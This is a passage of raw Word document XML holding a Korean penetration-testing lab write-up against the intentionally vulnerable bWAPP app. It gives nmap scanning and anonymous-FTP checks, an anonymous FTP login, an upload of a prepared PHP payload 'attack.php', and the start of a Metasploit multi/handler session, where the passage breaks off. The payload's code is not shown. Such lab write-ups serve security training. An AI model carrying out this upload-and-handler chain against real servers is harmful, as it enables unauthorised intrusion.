                <wp:extent cx="4618104" cy="265259"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1041" name="직사각형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104" cy="2652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D23EE" id="직사각형 1041" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:47.2pt;margin-top:2.15pt;width:363.65pt;height:20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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B30B35" w:rsidRPr="00B30B35">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA089B9" wp14:editId="0382D92E">
            <wp:extent cx="5760000" cy="805290"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1397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05290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C80019B" w14:textId="3525FB57" w:rsidR="00B30B35" w:rsidRDefault="00C065AD" w:rsidP="00BC3275">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">타겟 스캐닝 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB6BE9" w14:textId="3F333B89" w:rsidR="00C065AD" w:rsidRDefault="00C065AD" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C065AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BWAPP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">을 타겟으로 스캐닝 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC01409" w14:textId="0B930097" w:rsidR="00B30B35" w:rsidRDefault="00C065AD" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="80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</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">map </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>타겟I</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509A4985" w14:textId="218A6139" w:rsidR="00B30B35" w:rsidRDefault="00A52EA8" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8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9B691A" wp14:editId="14332BF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>530038</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>60431</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2112010" cy="226839"/>
                <wp:effectExtent l="19050" t="19050" r="21590" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1042" name="직사각형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268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BA086" id="직사각형 1042" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:41.75pt;margin-top:4.75pt;width:166.3pt;height:17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" filled="f" strokecolor="#c00000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B90E069" wp14:editId="3496FD74">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>599195</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>705891</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1056714" cy="134630"/>
                <wp:effectExtent l="19050" t="19050" r="10160" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1043" name="직사각형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714" cy="134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9053E" id="직사각형 1043" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:47.2pt;margin-top:55.6pt;width:83.2pt;height:10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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B30B35" w:rsidRPr="00B30B35">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26565DE2" wp14:editId="261A6811">
            <wp:extent cx="5760000" cy="2550161"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2159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50161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C829A41" w14:textId="199642F2" w:rsidR="00BD2937" w:rsidRDefault="00C065AD" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C065AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘anonymous’ </w:t>
      </w:r>
      <w:r w:rsidR="00B30B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">익명 계정 사용 유무 스캐닝 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0AEAB" w14:textId="4D2FDBDC" w:rsidR="00B30B35" w:rsidRDefault="00B30B35" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> locate * .nse | grep ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401263C2" w14:textId="0ADEB31A" w:rsidR="00B30B35" w:rsidRDefault="00A52EA8" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8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5E4E455" wp14:editId="4EC8F0C2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>530038</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52598</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2309212" cy="319048"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="1044" name="직사각형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212" cy="3190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581C5" id="직사각형 1044" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:41.75pt;margin-top:4.15pt;width:181.85pt;height:25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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B30B35" w:rsidRPr="00B30B35">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED3FC11" wp14:editId="093DB56C">
            <wp:extent cx="5760000" cy="1147696"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="14605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124"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1147696"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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878E8" w14:textId="42870447" w:rsidR="00B30B35" w:rsidRDefault="00B30B35" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -p21 </w:t>
      </w:r>
      <w:r w:rsidR="00C065AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>타겟I</w:t>
      </w:r>
      <w:r w:rsidR="00C065AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>P –script ftp-anon.nse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61427B8F" w14:textId="0DC91B32" w:rsidR="00C065AD" w:rsidRDefault="00A52EA8" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8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250309" wp14:editId="4C44A55C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>530038</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>23815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2608890" cy="257575"/>
                <wp:effectExtent l="19050" t="19050" r="20320" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1046" name="직사각형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890" cy="257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861E2" id="직사각형 1046" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:41.75pt;margin-top:1.9pt;width:205.4pt;height:20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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C065AD" w:rsidRPr="00C065AD">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576CB203" wp14:editId="762DD7B8">
            <wp:extent cx="5760000" cy="1856270"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="10795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56270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DB364B" w14:textId="3713ED28" w:rsidR="00BC3275" w:rsidRDefault="004A6E64" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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0C6A137B" wp14:editId="72E87DC4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>153680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-253936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10030480"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="1030" name="직사각형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0030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D802A" id="직사각형 1030" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:12.1pt;margin-top:-20pt;width:533.25pt;height:789.8pt;z-index:-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  <w:r w:rsidR="00C065AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C065AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bWAP</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">타겟)로 </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>접속 후,</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>업로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9677D" w14:textId="20E6BFC6" w:rsidR="00BC3275" w:rsidRDefault="00BC3275" w:rsidP="00BC3275">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="200" w:firstLine="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>- FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>의 읽기</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">쓰기 권한이 허용된 익명 서비스에 접근이 가능하다는 것을 확인하였으니 로그인하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA121B" w14:textId="46E2A141" w:rsidR="00C065AD" w:rsidRDefault="00C047CC" w:rsidP="00C047CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="200" w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">명령을 통해 </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>업로드</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B818DEE" w14:textId="464DF099" w:rsidR="00C065AD" w:rsidRDefault="00C047CC" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="102E7661" wp14:editId="67593E92">
            <wp:extent cx="5760000" cy="4299490"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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99490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F3A83A3" w14:textId="09B7CB6B" w:rsidR="00C065AD" w:rsidRDefault="00C065AD" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C065AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>타겟I</w:t>
      </w:r>
      <w:r w:rsidR="00BC3275">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">P </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5646A6C6" w14:textId="4A645B0D" w:rsidR="00C065AD" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ame: anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705D845" w14:textId="43151E1C" w:rsidR="00BC3275" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFE77C" w14:textId="3CB6FF3D" w:rsidR="00BC3275" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">put </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">명령어를 통해 생성해둔 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack.php)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 업로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4C406" w14:textId="0BB46FC5" w:rsidR="00BC3275" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>⑤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">명렁어로 </w:t>
      </w:r>
      <w:r w:rsidR="008272E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">파일 파일 업로드 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287784BC" w14:textId="5C62E3E5" w:rsidR="00BC3275" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC3275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>⑥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 종료</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F3F89B" w14:textId="0F0A5C13" w:rsidR="00D35598" w:rsidRDefault="00BC3275" w:rsidP="00C065AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    5) </w:t>
      </w:r>
      <w:r w:rsidR="00C047CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00C047CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>etasploi</w:t>
      </w:r>
      <w:r w:rsidR="00C047CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">t 실행 및 </w:t>
      </w:r>
      <w:r w:rsidR="00C047CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r w:rsidR="00C047CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>실시</w:t>
      </w:r>
      <w:r w:rsidR="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3566E" w14:textId="0AA7838B" w:rsidR="00D35598" w:rsidRDefault="00C047CC" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800" w:hangingChars="400" w:hanging="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D35598" w:rsidRPr="00D35598">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A238C5" wp14:editId="735C4CE5">
            <wp:extent cx="5760000" cy="1879984"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="25400"/>
            <wp:docPr id="150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8BE6973C-BD0A-4B89-877C-EE6AA59A43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8BE6973C-BD0A-4B89-877C-EE6AA59A43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79984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503440D" w14:textId="4B487D1C" w:rsidR="00D35598" w:rsidRDefault="00F8104B" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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B86538A" wp14:editId="36F4783C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>125730</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>bottom</wp:align>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10030460"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="144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0030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00663" id="직사각형 144" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:9.9pt;margin-top:0;width:533.25pt;height:789.8pt;z-index:-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  <w:r w:rsidR="00D35598" w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidR="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D35598">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t># msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8F36D" w14:textId="77777777" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>use exploit/multi/hanlder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E2D35" w14:textId="32298EAF" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
